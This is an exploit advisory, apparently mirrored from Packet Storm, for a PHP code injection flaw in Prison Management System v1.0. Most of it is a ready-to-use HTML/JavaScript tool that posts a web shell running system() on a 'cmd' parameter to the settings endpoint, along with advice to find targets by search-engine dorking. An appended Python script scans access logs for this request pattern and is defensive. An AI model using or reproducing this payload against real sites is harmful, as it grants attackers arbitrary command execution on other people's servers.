## https://sploitus.com/exploit?id=PACKETSTORM:181626
=============================================================================================================================================  
| # Title : Prison Management System v1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] This HTML page is designed to create a file and inject PHP code.  
  
[+] Save the payload as poc.html  
  
[+] On line 13, the name inside 'content[welcome]' is the file you want to create; it will be created with an HTML extension. On the same line, put the payload that suits you.  
  
[+] Set your target URL  
  
[+] payload :   
  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title> PHP code injection Tool</title>  
<script>  
async function sendRequest() {  
const url = document.getElementById('url').value;  
const postData = {  
'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`  
};  
  
try {  
const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
method: 'POST',  
headers: {  
'Content-Type': 'application/x-www-form-urlencoded'  
},  
body: new URLSearchParams(postData).toString()  
});  
  
if (response.ok) {  
document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';  
  
} else {  
document.getElementById('result').innerText = 'Error: ' + response.statusText;  
}  
} catch (error) {  
document.getElementById('result').innerText = 'Error making request: ' + error.message;  
}  
}  
</script>  
</head>  
<body>  
<h1>Injection Tool</h1>  
<form onsubmit="event.preventDefault(); sendRequest();">  
<label for="url">Enter URL:</label>  
<input type="text" id="url" name="url" required>  
<button type="submit">Submit</button>  
</form>  
<pre id="result"></pre>  
</body>  
</html>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================
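
For defenders, the request pattern in the PoC above can be searched for in web server access logs. The following is an added example, not part of the original advisory: it flags POSTs to `classes/SystemSettings.php?f=update_settings` and any request carrying a `cmd` query parameter, marking those that come from a client that previously wrote settings. The log lines, addresses and the `/pms/` install path are constructed samples, and the "combined" log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not from a real host).
SAMPLE_LOG = """\
198.51.100.7 - - [02/Oct/2024:10:15:01 +0000] "GET /pms/admin/login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Oct/2024:10:15:09 +0000] "POST /pms/classes/SystemSettings.php?f=update_settings HTTP/1.1" 200 1 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Oct/2024:10:15:20 +0000] "GET /pms/?cmd=ls%20-al HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Oct/2024:10:16:00 +0000] "GET /pms/?page=inmates HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3} ')


def scan(log_text):
    """Return (kind, client, timestamp, target) tuples for suspicious requests."""
    findings = []
    writers = set()  # clients already seen posting to update_settings
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, target = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query, keep_blank_values=True)
        if (method == "POST"
                and url.path.endswith("/classes/SystemSettings.php")
                and query.get("f") == ["update_settings"]):
            writers.add(client)
            findings.append(("settings_write", client, ts, target))
        elif "cmd" in query:
            # The PoC's injected page reads $_REQUEST['cmd']; a GET with that
            # parameter after a settings write is the high-signal event.
            kind = "cmd_after_write" if client in writers else "cmd_param"
            findings.append((kind, client, ts, target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Access logs do not record POST bodies or session state, so a `settings_write` hit is a review item to correlate with known administrator activity, while `cmd_after_write` warrants inspecting the generated `.html` content files for PHP tags.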